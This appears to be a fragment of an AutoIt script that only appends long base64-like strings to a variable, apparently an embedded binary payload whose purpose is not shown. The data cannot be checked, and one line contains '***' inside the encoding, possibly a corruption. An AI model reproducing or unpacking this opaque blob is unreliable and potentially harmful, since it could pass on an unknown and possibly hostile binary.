	$bdata &= "HWDvXwVVyR9OlB7Awjt/VPz8f+WK4TbQHyATP9SaEcbyy+k8ESGA/Paj33GYVyojAx8iItAeoWq5CoJcmyv/v3AjMBQ/fEk3WiP2L8MkkF65h99c+RvmYURKHSbw8MI+LCcxHzd3/81CFT8TgTqeK05CH6cooIAxeq78v/KtukBKEyoAFj+LmLHx/rIzhStgf3Plb3eTVTQ/iQH8LMBE77MPEv5P5sr/KzsuEBc/JNFiwYIAEr4vcFc1V/5nKShbfFg+SDHQrIJW+fj29827Hf/XMjAYT95Czfh/KjSAHvA3P/9iUJEEQfiDPMU14IEOrWWnhDTm7jdvv2Y3QBlbe4J+KkwfDjmg9TdX/v6lGebZuUV0OvBHXdbi/YlD5m7zb98nPFAaP8x7bSFLH+E9sP3+//2ACnZcz8CfoT8QGz+l6dPm2m4Ev0Fw/M2Vvx78ezevIdVP5kLA/Rur5p/1DJsr/6+3RCAcP7U9dcwgzTyPRoDMacrfX"
	$bdata &= "PkmqfItFWxI4Nf1b779jE5/8+X//0kwHT9JVCQ3tlHpS5DQndrNXIUwX/mbK9hN8DB00JcB3EnOT1AeP/I3V/4K4ie9yR1DdVGgpP40JUCuQG+u/L92UwAfPyqtCnF3+kd+VWBLIBPhP39z5bS9K4tXwEbSUG47jU2Azyz95sr/ECA/6V2hBvzTS68tOMnGjkmhk/aL3/w/vy5o8Kc1+W3Lv9IvmD7yN6/82s8gmQjhAOgwyKyxphKwhUn/v/z2MfAekCK6ueET7jIgIT+87YB5pSQWc+Vvd58MNFAe818SCeceRC41gPubK39di/R15UU6IjaobIojHt0BNX//V7+5SjfYLKqmHryRv3U4CCI/sPchP//2+3kjI+M8XqI5OB70H3jQebFGPdM6aL+d6jdiQxPancCfO5A+dQHlHeNSXfnbKwALPcBeMorW3Hd9E0Q+8O/bL79+AsxAKPs2gT8gI54nnJfhqN9vXvntjEBIHjQzFoS/DY"
	$bdata &= "DOQXh1Tn0qK39z5QSOShRDqCm+cjdZcjddRP8rw5vYHQOMLpq/ckUAJD8GrTfYneCdynL0P8BGMB6SMe6Dyt9ugVo/EkhgHmh8iwjEPUc3V/7mZ0mQ4ercqU7zOr9KwIU0ZYO/ufKgC8I24Evo/+N7hDymOR83d795PU0YJVmlUHfKSB+eTki7gROVv7nyLSrbOAJQeIN5vh9G8i4tzTv8zVGgXDkMxDsVLB+XUtAlwnf///E5WvxkfwRUACY/fllLfB8NB19zVTB+c+VvHlfEu73pKEqoVljzUsLsiUnt998PXx5YiD4dwA8JE06fWbgeA+VvrvyEZ8gnEjkTW+gNFETyIl4V/v/8fxDSDxe/7poyKaTKJL3O0t8WvzfcYoVtuUy58jdXTdO/uL+dm+ETKAnUj7s3WZDAU6TBNF/D1H/78ptfvAk+xBrWfNUvHrqoDPnOZE3myv8rNNb/Fb9nwrET1xk46tbP5W/u/jKwHXHanDE/nte"
	$bdata &= "fcWEax1CpQ5srf3NR2G+5AM7uJTs5Atk/Eucrf/vyX4swq3fZHx40ZyU256VMJtr+5sr/7xS/TZKcO2uIQNPavziqMf9BhEJz5W/uP3/bjzHEdRZCyxQp3F/5m59/jbuuC1n7+LzR3C/zk46jLB86b+7+X3jd/xO/0S7Vg17CLR8d3s/zgaDvK39z5bbVP4rerwe/8tSd2Ekt399c+Zt/tBM6XT1PPs7fTyN3X2rZV/7myo9CbuAfpZCGKCtFIAzh7/zNlf8Svy3qVn58Xx2o4b/rHUJ9xF9Bc+VvrkPij0sh3KiMWTrc4l/5myt/FA811/ESR3TjL+FD+o6HJD6/w99c2OMP8Pkj7v+tSP9t5N8Rv5b8rWn5LewK4IHSrx6xVpnv3W5Ac+VvrpPlf1FVEF72dEEk5k/lN79/ERO3BsOE8rx+suYfw77t32nM9wsqhAwQHqo47nw7Mh+bK39zzOe/QMEo/f8/BEEUVuiPlaaVv7n71jYa"
	$bdata &= "FzRfsehvzQbqrKBUQzlvrvzN6T8mdeb6sbEuv+kPA35G/HP3/8tzOobUvw+/yg4J7QWnSh+M1V/+mx5/jt5MDc1JSX+QDr89vUCDMBYo2+7f/B/Xn6Ykhi79R/u8X9g/Hn2Gv/v/+zNSyo8zn9nfDb8hfC40FM/5Pyranw2/4JW/ffm2hH2CiB7bPx5HImptCj47Dn5z5f/c3wy/hirfwa6ST/zcfzANIKI6n/DvN1/o3R+fm60yS4lf0N6/C/mbu99+YMTS2AU0H7TfXxWnINQLWkSsogpeluD/CqKpBJQ5Lf5mWr8qHruGr/KmsEafBv8rfzMeCFQzyqL0S+Di/wm/k00usdZX/ubKoj62459A+Ldf/cZAiuQ/N2/xNxYxnFxoVeU/WOXfCOei36787ctw/Cbmfx6Fx0q4l3gz8OYf/qPvb9fSrMYapxyf51p44B0vaAw3c+Vv7h846H9Mncd2XRhF+ugfyv8rf5lWmN0MuzO46b8Gv"
	$bdata &= "wGzQgbAdjk7/v3mcupf52Oh9eax3yrr/wW+NSYrf3P3CBjBTB/g659x0RL539Ezkuzv+PWbPzoakVKupZ9AkgS/3I6Vv7n7nyQPBT0f7O1/DkuS3QLRJ1z/r/zN7j+B0Kp7lWI+Au/fA7+g8iRFrXZD/dmbK6bvf0npdziiX0bwH+X/lb8eR/hfarIsKeLwvwK/ritq7ELaRP93f3N88V8LYGsF5IFBnxLy/wG/JSdypwxCufK3l0zynx4JvFSUuRpFBvNfv+gXvxESxvoCR9+W8/9G4yMeab/MXPmbuyMfIPSfO4reXti3SKj0P1X/o982KGBK+ZRfXOq//762SNYevP+mwxU1P2D+vmDe67ouMTE/NCh6Mx4eUaiyCEpE/1T+/+Hf/b7dPFZE4PsfRO6//L5Nz7JrOlVHGvzNVOQeFBWeLCezAv/I+f/7b/u+uGiV181VRv/wv/q+VZmixsiYSd++/F+E8f/5vnSQhwNA6FjyPx4Y85"
	$bdata &= "WVoPzL/93PNL8k83/4vobgiWPW8+zzv/e+ecr/u1dYDS+YQx+s9P/2vscHdAvXVE3/V/7maPU/6RlBHsspReD1v/W+euWwY8+oc+X/lU6U9v/0vnuG+dEthxo89z///n9/R4YjgD8RRl/3f/O+pn0td9npH4D4v/J+8w7/vgx3sYTBaicfGPn/8eR4/wceF//ub+4fqPk/9r2IKhAKPH80+n/wvqjk6b/8v/KLCfoscPV/775+3L5VWSA99n/uvir/7/7Uw9HLmrdH/xD3/+y+goWb/3C4N/j4//dv675t3TgQ+zGf0Pj/6b4nooqm5m1O/5X/d/+g+X/ovpnm5Jzw2kxo+v/mvkvp7ll++X/lMMAyIPt/5b7Mn3HE0Oof+//jvvL/7osW6UJmZTk/MPz/4r4lGbKdMsdG/tv7//x/4b7OpRdFq544v57fvtdgpT0O3z83lf/2H37cvsv7EUU9fAqA2b51+80b/N8TTYiABx9A/f/Wrjn"
	$bdata &= "ko8A+H/+//6bw074Bzvq7OcE2X/7/0L5rFzwK5njtv10L3x7LvvKDQ3FUUjs/B6SH/8e+u/jiheFkH6b/9n5Dwf4SR9jAZ0y/Hre+X2jQDSUFe33ziz8f//+nDo5TU7W+Af3//xcWuLNi1H/EP+5XZJamw3k+Y7SLKkdQtReX8HeCQWlGQy7Wv781b/5/+zP7qT0WHrfNuJopYZs8YYB3PposXQhbU/n/zf+DkHG8hX9u6BVDbsl3GRyjkLx0hRXTsFn/N/+/ZbR1pOJzjTze9t0pa3AmPLHi35GMvMibdd/8/+YYRYf/hLJLvoZhPIPzxso+njVhMRh48/+b/0iRPA+J+WxYtQph3Eouppg890dyK5LM/2/+f3FP4hbcHpA8otHTMuzjUnvFJxc6QDwb0/6v////zWb7e71OxO2ba7xRWxLQARPxPzmbRDkQxZa8zDf/v/kxbMC9KselbLMUtVG84C2prppCnjbx/7/59pq/L5NejqXI"
	$bdata &= "mFoJq+65akCCPHtRfTy4cv/N/29+dYrXuUGQgbzqjYw4+YprD5fRIxCRvHU3/7/5y2/rW6PkaEl7TFuOPNRcBITguwf2Lvz/5v81hlOZvKq5aDGH1DxkogBuAZ48Hdn8IlDtX/Wb34u3ewKY39aMYog7BoKUhEqBdf+//YbHPpbcfZFJHx7tpZSUfqmCPDhidW56OP/t/zdyBce2frCZPD+msk/OUV6k9PS+VcGKPN3tN7/5fOJlRWvZ6UCZM72BY/Xh34R+ff+/+f8NP4w6TJq84d4f9Z2eVRKtr+gShjyQ2drQf7j/5v83oxo41twKQbwLA+SmhdLUQdtURwKQPP//3/xWLz6pr+yDI9VFD8pxPBW3MQr+BvM/5IIx0mq4/fab9DHYTPxwIR58BBiO55z+/xZkzf9vBdA8PqVZNoQhJ5M88Z+SX8VWKP+/+f9GTlzuXIu8y6k6N6dx4epCv+o6lrxm2AVtroz/5v83vASZPI2Vnrz3n"
	$bdata &= "+U026fi9WHWNuR1vPab3/zlqBPDLcPDKV03+P8iNBJMpt7e/7ff/Lue8BEJ2hyArARF+h7z+Vb5I9CXvCou9//m//8hChb0P3iSMBxp8168l6hQ2fUxmHlf493Hgbyb/9/8LYlhYAhOz4DvBHqbSDxXAB3tQWp2iv5/8/9k0UuUnDzQPMG1oobwYpC2o8FzPN7T1/Aqo//N/29WvtHzYsuZPCcqNtXav+JC7K+XQ308DTf/v/nd/Zmy3DN4arzb7Jg8pyyddrL541dZ5v///9IJs5S8QmbPotoW9T/uk71phXaPvIJPnVYrNP/t/6Ks3h2+eoC8D5JdyqRRPprl7e+caI282m/+//kntTZHb5MdASy7mTz9x5fUEo3nHZpb9v/P/+GVgjwpVEjdB6tHRgVMMpY8t0ZZiibJHqrf/P+ihmmBG0s8PEghrRVv513mgDD5ph63b/7/Cdx2ueEF9j9H3labQuKTVTqwfiQelrRAyd785n7Bgy"
	$bdata &= "DDzDRGQzKJnXV4/n9zvP4lIlWCxj4zHFmHCbabvHOpTNRVgfnN/29kPvdErjhgPM07f2aeoFVkshM03c3/b7+/2gt1EsAeDAv/Z1aJcrwvGmU8st+q/7/5/4g8aDq+a7yElFH5ff/2DoYlDzyIvHRf7Oh1H//mm//3P5l6iIZHboGBpUiaPzvVZWzZqJC885vf/MlnQlbrX9NtMVdZJD9d3k9pgP/2G34sFgIKuGa+hwHrcxShHi+ZBO53FYS8m//f/DLBMAHtwdVNFtFMEp88Yk7PNvPifnnz////FboCXXA8Eho+VCcE+D8ql21ihnySvBPOTJmJJf9v/n/XMhXUHUydvK3HI0YaR/vNQaOE1oi87ZJEm7/5/83ZaLr21Jv4xp+8mWaK2ceKOrV888KU5v83/5k826AqQuWsJkuGVvHpljyMRLUWMs//7YL/quPpMl7VcLw2KJmu8d5sl+OiE8yFPMZvv/n//5ELWxT5PyMlWC551uX"
	$bdata &= "FzbA3Nx67frWB+//N/8dfZ7wPUsjLRFo58KWWfEt2vFBO3p+CfV7/229+0IUbfFsYugfKcPGgHjLmzpG9c5G8kPDdpH/zo4KRxL7ycbBGfHw85hlj6OKb/79ebkzmeMokeDxl5V17Zgz61RxdSVnN/2+/vjMtSuybMB6rNtx9XDCWPF0lPrIDVeH/v/n/QY3bbi+dvFizMBOeecZjxcp+y5s8v/15VWue/+b/NzH99w7J+pA8evPTv2vD0GznyjSSj7z//9/8rdNamZ/ogcxdNM2hlzxmto0pBw77PyTkgEz19v+b/96bvPsVT7iiMwfXhDBegGK8OlnljXJZPv/f/P/jbbq733GcvEde+/J2fzqsVH5PWHW8SgahMLB/8/+bpS4pVA7T/J680sFLkB7MhJ4tetA9gsfNb/48CR7XW8LycpxrP8r9nFKF6nYDRHwZ/D/dSHwQgTxI3/z/9v9fq0AeCsaD4DdFmzxL0Vcu8WesPEj/TfP/"
	$bdata &= "m/+Ikjy15waUbY9EXIBIvKxxPGmQ79wgt9Nv/n/bSenRywN1PPrDXVUL33KdglM72P63v/1/fIkHSi0H/T+cenlDN9q88okNCIcvHneFnRf85v9xe0idvIek+9wYWAY3W9cC7T6Yg8m/+f/tFuOAXujf7YvBHpG8hTLbA+apMrVtaQAj5v83/5w8YLQB8yHTwhjweFfakjxfm3szl/x81d/8W0sYT82lKaH1FEYm/h4UeoEntv/tTQJ+UovnLlAej8ypgImegzyDN/+/+UzH+1F64Y0MyiLVkjzakKSir6STKJzfXmCwF7we1o4tSM8ejK0RtPP//5v/k5y8J1ph7hv6sLakhvTHnTyXums3KyX/P0OO/n/z/w2/paGTPEBFblt2UIqh2C3h05k8FL6crf17/83/bwk1BtASu5282JCegcGnHpOl81NIhzzxY62/+XGPK8LT53lllnTrYr59CIV9hEMPlw8AKgwuhA8/jvz/w2YBfw8xZ"
	$bdata &= "4rnf9hVP7+gBNcIa6wW/P83rk66b6uygz+OxYL/vb/OP+85eEIuQsB1gh/4YV9KWyN0vwEnD3Qyu4szgB/g4CltEyO3+C8pJaVk36y6SkpJKcjWntJSUuTy95JTckqcqqfklJy4xtTJKTkl4vBYEktO/gzWNcaSGih4Wt1hkgS+SUNyEriR5EGnNUFuZDcZeEs23yBaWS8CnjTSg5qKASD+Xxl4XZAnNxggSGlUUc/SZXISeavKFtK7PD5CTEmlJdaL4ScnXT0oWynwICg2mJK8pIuJYP10hzRo0GFIr2dLA1uzxGQ6YG0jUPobNB52MIhjb3B5mw0EgdmwMpFgR9obtHt2Yv5TV580MEinZHn6JKXAxpU1B0pb5iEhj0cg+LEUIztgZWggJUOq4IVXJR9qqw1GJk1PjgKOWJ9w/NgeN5KulAdbXVbODTkFQlA8Ase11T87YGzoGLsbSs1zaWceg0qvcPcvbmV3Ebd2ZmxsEBivDZFHXZ"
	$bdata &= "WMSx7cSfdFJpDMtkgGdWTySHDUDas9vG7IYDuN3w03olivTn2tONYCP38QGkgp3bJFDgBpRXIPVDGgWN9/02GoIm9zZEKitUMG5TKRLxYMj9QnVbGDFdu/f3krGlUXN2AWCWdje9WtWS90vm9mh2PdCtc3J5ezJ2YXNf952l49BnwmPDw9AD4+JV33PO8WLwYtKypHfAZlUwjAXx5+KClSbiW7XAawfzQ7831mAG4+Kg8tACs6MzjuQGJvACrvmjAn2j12ITxOwtGIb2f/EHjt6l91bpJnHGQWcqBu6zLTL3ASNjQOZ4ZnoBK1V8w+GVLYg7oWbBeUucfcbkdwYS23a4czl158Dr9kKJ7nPUY/3PAG6NzQeZ7necS4rKSYeZ7N5owHEtfozLhs373nmHw2hAYOnNgWTZTveZ73eAZ0cGxoJv8/XD2v0jxYZFSeUBC853XnJkw/SB4URAZA8zzP8zw4NDAsvOd5zygkZiBkHAYY8zzP8xQ"
	$bdata &= "QDAgE53mezQDb/Pj06J7neZ7c1MiwpJBsnud5cFAwENrw8zzP88ywjGxEZ/M8zygYFAzZ/J7neZ7Y0MS0mHg8m+d5UCgA2NS44TvP85RwRI7X/AAhJtCnR7/gwsBLqVOjG0/YQT8xvKOUQi/ANkw7fttY+GdQynVwBe4seycfjQBNog4bPpEILGIHHp4FU7qWnqUMflWjAICtWYcDkkOO5CAoIEoOkq9IABCEkEsO5BCBAbnkkgsQggLgGLYAdyADhiI5IGgB4AjB0gMBA20BMu0BAwJ3UAWrgr//DrZ2ugMUGzcBC0IbxAFf0yy0FQTvIwC0/j+gF4KDhIWGh4iJiov//79JIo+QkZKTlJWWl5iZmpucnZ6foKGio6T/////paanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8T/////xcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+QY////5ebn6Onq6+zt7u/w8fLz"
	$bdata &= "9PX29/j5+vv8qC5KAN5xokZcVDFQFQTgcf9JjSqG/xhSbFFxP/8NuDQAf2LowC5fT4AuvXdrPAZOwA7A3/6ffx/K8klxBvFgQqINjVnz+MIfbqUBCCq23g+BdC5jgeXeNuRzaQ5tb2RmaaSuMe4MWWNlaWdhScvvlH8eZXhwMTBgL3Nphfiea1xnBzdGAHDuMeRtCeEjUU5KDklORgATWd9lRFMvXwSsz3gnUGaiFnhiNnkMlO28bgYxkmZyFmvYzhgob2h5rAYg23amY3D5bGQ/He4MQZN+fnRXMgyDZ7C2bLcPVAByyngPlBE4kzD8muTaGzSXCx8M/z8hLwkBgCPVfwdOGxCuLQgAKxfy//8uxxOMOnMMHCrOEa3lAKoARHc9fFVCLuRiP32E5EIu5H6Tnf//Qi6UcaWXCW4S0BGfigCgyaDIxS7kYx6XmB+aXMiFXJuZf4VcyIUFbciFXMgJg4JcyIVcY5CIhVzIhSZ5yIVcyCdkE"
	$bdata &= "FzIhVwRHV2FXMiFHopycVzIi4lfehdyIReWlYUhF3IhaIZ/IRdyaXvRzHygSC72RZuBh7vET8M5QtIfoAu52MVfpR+mkAu5kKinqbmQC7mqZ2YLuZALdHWQC7mQX15guZALuaGiowu5kAukvJALuZCrtLUu5KK6rj+vsUIu5EKwsuRCLuSzuLku5EIuuru9SC7kQr/C/07pfw4hBvUB0RG1ElyBw4SwzAYiwbnYP7YZHongnteoKbEfsguZkCHNsP8H2Pxg7LTM3LmsgL4DSHMiGBX/v7AK/gtsHqgNQdEitcjzXB8vsqBSFoaroBBZz///9i+2KGWulhEAAPgeDQ3gPUw5bzzSEYF7eZeN78B6tw9PTEU0OdCFAE/ESCeUtSIi/olGDe2gbAEvsObvec8Mp/UFHhwGNNhGnedQkCbwBF/ZxABhBD9AZwuYQL4MNlgDbHuBvFV3tnxwAn82MsgErAO8d0hMIK+MAejyQt46j274qACzIc"
	$bdata &= "QB8OEBHzDkBHIFT8DwVGhYeyfwZAY43/fYcyFv1M6ImKA/58Qm2M+Ij7Egb3sngtDP8OAG7O9HwYVMsAGX0GQmG3snZPEc8SwGND+Pdi7kAfEciFe9gjc7Akd0BoAniAF5LmSCl2TEsJBLngvAzMTkuQgusL/8/AQbeyfyDAYUP49W8U7I/LI0ZkTf463g6Y9UZMdPnmlbgld3n0yUsOedCMfypAawzEfIdgmCx242fACNXQQT6Nf4nzshm4n/nPMU8yQGlmC2ou9G/2+5kOeWl9xgcOQCueR83GDPhTwnsxisvMiQC+Qksxis3onhuVT4H/QIBhAXMsHGP4/4eI09F3tmQI9QWD88F/KAj/RAlIgTxztxh/SYBqiHsxekJZCUdy+oY8+FPNjo8D/tndpqj2f1HAYkZ3exE8jM9Qz39CYveSeKVE/1ZJZw9AHnhEwgVLQkG3sugqAnsLg/jxxcyASgXCbo5CXbhfiW9gRcAdi7kAnooG4"
	$bdata &= "0l4Fc8pz2RFCgCJ4LOfY04IC/E2zsnfaQBpg/j4Au5DkhtQjI2MgEG3vgP4/Id0IWXDC29xD3IAYlCN6iLAdHt4ngmbZvl3xcJzLBxt73bAZ0P49cOzE9F6CkN/e0BiWQE9PEN7WghDwXpHfHtPRBcAXv+AQGEDe0xyJ4F3L04G5ANyC4kHf4UJ5g4DeQ57WXd5+2DJBvEc67oAawx08J5Ltgn5A2MAEYSEtE/6b4TshmIg9E+Rj5KBC8FeIGh08P2DNtS3efaGj/Anntnfl4BoSXaAGceC5kaKy0jxca8R75xAbYx1bNhUywA6e0yPo973dMRwYJ+hgGNFD2VvKCt8gFjzatGRPI7ARsvx4EI+S+fD+3DEKeC3mouNQudoGctwyotzBi74Rs+wT7FAYwtxdyArkw+wRUwZuNPWAdR3AGkHchE+xFVAa/YPNcyHN4wNDwLpArZPwMeMAxnEAOtpj8KEc3AcU7/DjHf8BWXvJcRP/8/LfA"
	$bdata &= "jiGZQPzsjyeq97YnuAROyF/82EAeDHgG6Ee4BLLgljZ3Txze/RhLMbwT/SgGRKdmBWkJBm+Pz4rnQt6Y3ihAiI+cqPgm/U79uI+4QM8tLYGXv2zoi2RzIfj+GO9CLpBs6JCWSLy3aghvHlgGfHnAXhWHkAfH/kidKJ4LtKwn/rwmkFfsBti3tAWsFwHeQnb///8J5Iq9GAY0t9hceF57j7e5DGQPCTb2Hv90Bnw/j6LGuZBkNP+CfZNm//9HAZcseS5krEj4V/CsBcEGFC9IvQu5YJf4cG5E5Aqei5dUYC9weK5tA2+XrJDskuciL6CsrJfDcyEXkNjc7wRjr1tH7Ab0PyeyOSET3LoIASTkFLwTATQGQCe6CHimbQlvlzBwceB1689HgAac121tgBy6j7fIcyHPVMzc+IVcIFdUzOydkM14AigCOAZUt0JOIFd4AijkuZDnmISUsEIukCuYhLK5kOe84PADDCEXyBW84OQ5sXfcjjy3A"
	$bdata &= "0xo7SWQK9yPt3ku5Hm7AJioxMgFcgq7AJjKUONcJI8ItVEF3gQEBihXdgf0LmSCx/RInlhs7OnW98docD+P5LmQBwRYbKAEG3susLg/j7rwXMigmOg/9iLY3h74BgUIv5gCn8G7kAnouHY4L4CNvRMFSAZQP48RPBfyBTjcgC9AMNA5BZDmL7mQE8jcBYD4GHsu5NDg6D/NCZkgL9C8EAaJ4J2QGAYoBjgv3NISyLwQd58wSjwX8mh4iD8RXDC3T59oP/JcyHNEuMjYC7lgF0SfuPZOyIZgbgcIBxgGID9cyAM2jwcIeBvrFvJQt2g/j/BcyARQoJhaBO9EvweoBri/XNsGVOd3n9B+uBXp/0dWCARCJpDXl9AB6OQ5sXe9DG40lwhEUAs5gZy9DAg0kudCnkCAkJy5kAvkQIB4Lnku5Mzc6HibC7lAzLQJGOTaOyEJKAY0l7TxXMgJCRjsZG9d70SXCXQGhPdP54RMsAKfZL4QJ+S5kL"
	$bdata &= "TE1L4QzYVcILQwClzsnZAEChQGJJ8wngs5gQoEnFS5kOdCZHScei7kAlS8pCt5b4XfHrSmyHMhE8i8A6Tgjb0T1fhPCwgGED8nkG2Cj/g2wsALSEYL52KfWD9zIa+NfthWdIT5JtjYjD+/dDb4At6JYQLE3wvUBqhAHk0OBuRewxR2ir6R/c8MEG8RvFfBd8MsPjB3JtjYOwxABkg/xzBOFM/Fj+R4pwyIORXP8wacuPSnw+RANlgCfh7EBJS0gZwM1K7kE3KC4cQkHw0QDfC+tbUgbwGHQD5A8mrvRI8NUAZk30AD5LnYBECnaJSQK3kupLhoiHNCLpTGWAnZtEH/nvgOCLuQCeTGWALokHavvRPDOE8OSAZUl5AB50IeIA44rGHPu5CElAagvEcJ5Ltgl4Q2yAAhbVACl57oJ2Qzsf/oDwQPFDC3G3gGID9H/8jz2ktvl8cIUEBO8lxgbMcIQp4LuVAwnAvkkuesuDAu5LmQnFDo+Fw"
	$bdata &= "gl2wQBFDonTjehXhuNJcQRDxAXuwGVJ94AhA0cyHPhZiElHKBXMikmITPhTwXuNTk9OGCXQx3uJ/UqxQmQjdYb4kazwwHyBH/ecDG3hFIBlA/txE48i2FC3CmXpABeC6KBP8REbyJYMxfJ6RezL0Fz4Xc6OdHzYnggs/Mv8lkEmzsnZAYEigGMD+P5LmQBxIYhGAEG3sucHg/j3YKF8NgT8CnOxE817esvN8SzAZbcE3F2A/Jb28nZHNLl8gTCBMYEshpeAYkd8nICW/kzW8FHgZQBmzy7HmP/xOIBqT4j8oQBeTqwgRAt0KCKenablT/BMBvvVV4LtDcf28rGWSC38AEUGxODD/KdBQoh+d574ViHjgGbIjPRsiC5O4VbDYWFfZWwbDclwsfvzYvDBPIrAqkx3eHuApp7rTQ/hS8EzIkFRUQbhwOIAPyOAAHyxtEB+ycN1TnnlvJLElkZxQ2QqakwTxHEKRklorntMDHbwAXyBUBxxAE"
	$bdata &= "Q652JRAnAO9BiM3LfBY0PxZEBlhby***P8t8fy7kmdinoIiYLJAreaygCuFECOe2MOfBgefaz8DwN8mDSd0XBxCvy8DYm9hbd5/YdkCfQC7kuVBg2CHPhZwXQPCQYBfDc6CwB/CfHM8JuZDMEOB3QJ7WTRfH/JfMEAEhmwuZ4DAYLJAjxDsYPAZIH8zkuaUlb5dMeLAreC6IlC9Ml4HOhVx4aP+3JrwTGNQG5FdP5kImWAKfxIRW8U7IGRQZJAY0B1zICfZPnxkUpF63KuL/R3QGgEImkNeXpAFk5LmQ58CwwMyL4AK5wLDPoXdCnvD8GgwGHHJB4Fb/T8/8nou9E80QdkyfXGw5wd4qD0+fGkwnQpwLKP8arANiXHsGuJco/7ZGnJAayJCXv+2dkOdk/BsMBhi/hoIFcmT3gC55LvZuSJdYZIACaZdAbjagkGaixP8bG5FneSfNuF7MATbBxp7c5D/HzI9sJvYuoO8n9Bwo53kPCj8cO"
	$bdata &= "AZMaFYF3o6kX1c/Ggnk5n82zhQC5Clpg/+ulM4sAWmDEAn/btCx7q0tAYen8F9gb0M3HQcMp0fPsRPIu/A2hB1Ep7MExXNUKE+GXwXGmdgn6P/Bxp5uh5igP+85OBEh59OAFtBbAJwL4AYeCEfYuyAIh9A2oM/GTgQnHiQ3HjSf3tvaxP+gVyfmBH5ksLHnQnR8P+dm2x5LZ5A8RBs/BiBAzaf5zQzALGEFAKnB4wjCOHme1j33D8MGaJjI8zzN5/gzxFiIuOd5ms/oGMVIeKie53mf2AjGfsbGxsbzvLN5xijHBoi4PM+7z+gwyE4GoMj4eZ6n+SvJXoi46PM8T/Meyk5wmNA8z/PuAMumBliIuPB5nqf5GMxIeMH2z7tP8/8/V82WBc6+BmOQ8+7zPLj8Rs9eBrnneZrP+SjQfqj6p/k8zUHRgeAw0mBP83meiMDwGNNLg56n+Ty4BtRIg6g8T/N52AjVOGiYz/Pu89MO1iYGaJjIn6"
	$bdata &= "f5PPgo11is2tfnned5LtjY2QaIz9N8nrjqGNpKeKqep/k82ArbQHiqPE/zedgk3EiAxM/z7vPqIN0mBoC46PM87z4a3iYGeqja53me5grfOmiYyHye590G4MYGeLb4M+FpPs/TWJ7ZCOI43n2e52ia3AjjlgZoNJ/neZjI+CjkWmk+z/OIuOga5UjTfJ7neKjaG+ZjPu8+z5jWG+fmBpPa58/zvPPm6AZomsj63udpPijpZq7Y6U7q93medwZomMgD6058nud5BluLuOgY7PM+z9NQeKvx7Cbtu8/zvAaAs/lB7p4G53maz/8z71iLuDSfd5/7SfCGBq4U8Uidg8/zeKDq8d7y8zSf5wac2xDzO3jnaT7Pq9sI9D58T/N5nqDA4AD1IEA+z/M8ZIirzgz2eZ7naS9Slbncz/O07v8v9wZagqXInqf5POsr+HenyjxP83ntEPkzVnlpPs/znL/iBfoo53me50tukbTXz/M0n/od+0Bjhqm"
	$bdata &= "e5vM8zO8S/DVYfJ7neXufxusG/fM8z9MpTGeK0ud5ms/3Gv5KbZBP83meq9DzFv85XDrP8zyBpL/qz/O8BUgANAZaiKO+nqf5POkUAUdqjzzN53m01wcCKlX7PM/zgqXI7BkDnj7P87wGYpLC5y0EeZ7naUiEp9L18zxP8zYFd6/T9ud5nuYRBixHapJuU2BoAeSvzA/+xC3wXgF9BpHnBbGQiR8YEV43JLC5ACcnN1dkpNKOv2bYAqgX7dqJsgC/3FcwdCHkJCUIRw471qKNWJ+XDuTI9gWvHnMCfgMycvZkiZQFD58Gqo4ceXK1wAnLCtYLyAQjR+EM7H+zSRsUDMg3VmA5yUVy9JAmICK55CLATG8iueTweLTvi2Skew4oZwKkSS7atVC/2FeAySUXyScEsDATySUX4Fy1kovkkhCIQOSSi+S0cOBFcpKLoCgM5ERyydA4tgC55CK5ZDCQIrnkImC85CK55JDowFxykZwpFPBASC45"
	$bdata &= "kbcgbLlILrlQmIAuuUguxLDwJCe5SOAqHJ60b024fQ4YIAIiGelGKIcESEhl5O1Qd1gBYAPpbhfJjJAPmGcCb8UiGcjPV8lJLpL88Csoi+SSE7kgVJKL5JJQgIDkkovkrLDYRHKSi+AsBOQiueS6EDBAbGIIuVxAhbbkQD9SqleC26m4l4jHLJgnqAch5JILkOAKlRND96QgaaXtsc5XBwPnLQyfU7TY9u8OyAF/zy0+GGK3MGccz9i3cP/IycnVz3Tw+BNEJ1eYhA+7aYPkJS3cVlCXXCQnLgiANPXBEw2nshjo136zhYrbCj93YNfgdpJT77uwLoRXcDrexYIXpw7oJ28yUXQuwIe8V8lJLpL0QC8gFsklF3BMdCPbo+cOqwG2dwO8YJGMeOe86yuEkJMvtKYdTCSVBTC9v40cOfIOKwE2AkEDT0hOO7lPgIv/MDTkIhkZBozA7eTk5MvW4e8PSF4y0fq/vjC87ZITnL5QZ75Y6GfkJ"
	$bdata &= "CcXgIgxHEm3AYvvV1CD1m4X4A/uvw+uNeVEvzAOO2ew5Fu0SC9X5EVykougMhDkRHLJ4DzAIJI2KrpoV564tGUuLFfAHmBdcrudaA9z76DgctFOFUczMO/QdjLydtgf2ALg6g9Hjpzq8s/BIMErwTZpg+QkM2B2YAouOTlrdpyXcpHMBgi//KAZOXtyqLACD7gDwGk4OTnI0Nhf5HsTyTRgwh8OCAE28uRkEBggBChfkm9y1U/Cx5Ak3SIsH1fESC65XbC/uPBykjmwx8I1JEi6yUHDV1i4SC65QIRwLtolJxfDeLBnoN3kE06ov8N35J6cXCTg6/MCJJUnzA/7LgQ27eQ9TcSnDjhA/1ywSLp3ZN/EVYvkm2eg5ye5SL5X1NA3AJJLTiTFACwukksuMFhgSy6SS4SQtCcskrCfZsjEIhmpAtwneXHm78VWxgM4EPkmEwXnxldMIrnkImB45CK55JCkwLnkIrnQ8PxITnIixyA5KFARLr"
	$bdata &= "lQVNcdYpG0nqQPt9vtpA6IkC+aD6Tv0BADySXMFGTYRNKXOsgPCuTk5OQUHigy5OTk5DxGUFrk5OTkZG54guTk5OSMlqCqXsXk5LS+fzq8SK6dSMkgV+hcJCe5UDsUgJdcJJdAsGwkl1wk4JgukktOyhDEQEkukkvwcMklF8k8HKBIE8klF9B0ywOL5JIAoEUy0p3Pyzi/AszJRTvJcD0AV6BxyUVyLNBYR0YOGkfMzMwWdpGMdHcDhEDPZsIiucCXzLlIGkw37KAkJzk5qLY+IEimCFj/PsgpuJ3NEA8YNz6IGfkEQr7+yO1E+y1B2Ew/2cDXMpG8hnc+/M1q0V5yzT8oZyUXybffV1zg5JITyYjOELSL5JKLQODJRXKScEAMoHLJRXI40GQiueREzwCQ5CK55DC8YJzkIrnokEEUkVxykcBASKU9YN9m+wLJkRPJbNAw0DjfikVyoI+/1JOcXCSgq0Kd3C6SAOAP6PCRE+10J0I039E"
